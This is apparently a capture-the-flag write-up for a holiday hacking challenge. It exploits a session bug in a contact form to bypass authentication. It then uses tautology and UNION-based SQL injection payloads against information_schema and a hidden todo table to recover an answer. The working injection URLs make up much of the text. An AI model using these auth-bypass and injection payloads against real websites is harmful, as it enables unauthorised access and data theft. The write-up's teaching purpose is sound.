Frost Tower Website Checkup
Difficulty Level :  |
|
Challenge : Investigate Frost Tower's website for security issues. This source code will be useful in your analysis. In Jack Frost's TODO list, what job position does Jack plan to offer Santa? Ribb Bonbowford, in Santa's dining room, may have some pointers for you. |
High level plan
Below is the high level plan after examining the code.
- Broken auth: Exploit the /postcontact endpoint to log in and get access to the dashboard.
- SQL Injection: Exploit the /detail endpoint to get additional table name (“todo”) and its column names.
- Get data from table “todo” table having the job position for Santa.
Get access to dashboard : exploit broken auth
The base URL of the website is https://staging.jackfrosttower.com/
Looking at the source code (server.js), we figure out different endpoint’s pages.
For example:
a) Dashboard
a) Login
Look at server.js (around line 670)
The /dashboard endpoint needs a uniquid which is apparently created only after authentication.
The /postcontact endpoint checks if the contact already exists, saves the email requested in the session.uniqueid.
So, we will first create a contact with a specific email address and then use the same email address to attempt to create another contact.
That won’t succeed but the email will be stored in the session.uniqueid.
[server.js, around line 151]
As we see below, entering another contact with email Stephan.Strange@gmail.com fails.
However, because the Session.UniquiID is set to the email address due to the bug, we have a session.
Now, we can access the dashboard https://staging.jackfrosttower.com/dashboard.
|
Adding contact with email "Stephan.Strange@marvel.com". Contact successfully added. |
Tried adding another contact with same email "Stephan.Strange@marvel.com". Fails with "Email Already exists" error. |
|---|---|
 |
 |
Get additional table : exploit SQL Injection
Now that we have access to Dashboard, we navigate there.
In this dashboard, we see the "Detail" and the "Edit" functions.
Looking at the details of one contact.
https://staging.jackfrosttower.com/detail/68
Now looking at the server.js for the corresponding code for /detail/:id
We see It takes a CSV of contact Ids, split them with comma(,) and then form a WHERE clause.
e.g. If we send
https://staging.jackfrosttower.com/detail/67,68
It will result the below query to be executed:
SELECT * FROM uniquecontact WHERE id=67 OR id=68
Resulting in showing 2 records on the web page.
| The code | Input and Output result |
|---|---|
 |
 |
But if we add a OR 1=1, it will show all contacts.
Tautology based SQL Injection
https://staging.jackfrosttower.com/detail/67,68%20OR%201=1
Going back to the original question
In Jack Frost's TODO list, what job position does Jack plan to offer Santa?
The zip file containing source code also contains the database schema in the encontact_db.sql
None of the tables in the encontact_db.sql suggest they could store todo items where we need to look for.
This means there are additional tables which the source code does not provide us.
So, we query the system database views to find the additional tables.
So we query the database to find the additional tables.
https://staging.jackfrosttower.com/detail/1,30
UNION SELECT * FROM (SELECT 9999)a
JOIN (SELECT 8888)b
JOIN (SELECT TABLE_NAME from information_schema.TABLES as email )c
JOIN (SELECT 7777)d
JOIN (SELECT 6666)e
JOIN (SELECT 5555)f
JOIN (SELECT 4444)g --
In the above query, we are combining the uniquecontact with hard coded values along with the table names from INFORMATION_SCHEMA.TABLES.
Its UNION which requires the number of columns and their names match between the tables getting union'ed.
| Columns in the "uniquecontact" table | Hardcoded |
|---|---|
| id | 9999 |
| full_name | 8888 |
| SELECT TABLE_NAME from information_schema.TABLES | |
| phone | 7777 |
| contry | 6666 |
| date_created | 5555 |
| date_update | 4444 |
When we use the above URL with SQL injection payload, It shows the table name from information_schema.TABLES in the email field as we setup above.
https://staging.jackfrosttower.com/detail/67,68 UNION SELECT * FROM (SELECT 9999)a
JOIN (SELECT 8888)b
JOIN (SELECT TABLE_NAME from information_schema.TABLES as email )c
JOIN (SELECT 7777)d
JOIN (SELECT 6666)e
JOIN (SELECT 5555)f
JOIN (SELECT 4444)g --
Now we have additional "todo" table which may have our answer for "what job position does Jack plan to offer Santa".
Now let's find the columns in the "todo" table using the same methodology but using the INFORMATION_SCHEMA.COLUMNS.
The only difference here being, we concatenate all the column names as CSV using the group_concat() function.
https://staging.jackfrosttower.com/detail/37,68 UNION ALL SELECT * FROM (SELECT 9999)a
JOIN (SELECT 8888)b
JOIN (SELECT group_concat(COLUMN_NAME) from information_schema.COLUMNS as email)c
JOIN (SELECT 7777)d
JOIN (SELECT 6666)e
JOIN (SELECT 5555)f
JOIN (SELECT 4444)g --
Now we see the columns in all the three tables.
Extract data from additional table
We now focus on the newly found "todo" table.
The most relevant column here is note. So, we get values from note column from "todo" table.
https://staging.jackfrosttower.com/detail/1,30 UNION ALL SELECT * FROM (SELECT 9999)a
JOIN (SELECT 8888)b
JOIN (SELECT note from todo as email)c
JOIN (SELECT 7777)d
JOIN (SELECT 6666)e
JOIN (SELECT 5555)f
JOIN (SELECT 4444)g --
Now we see all the notes from “todo” table and one of them noting Jack Frost planned to offer clerk position to Santa.
We enter "clerk" as the answer and it is accepted!!
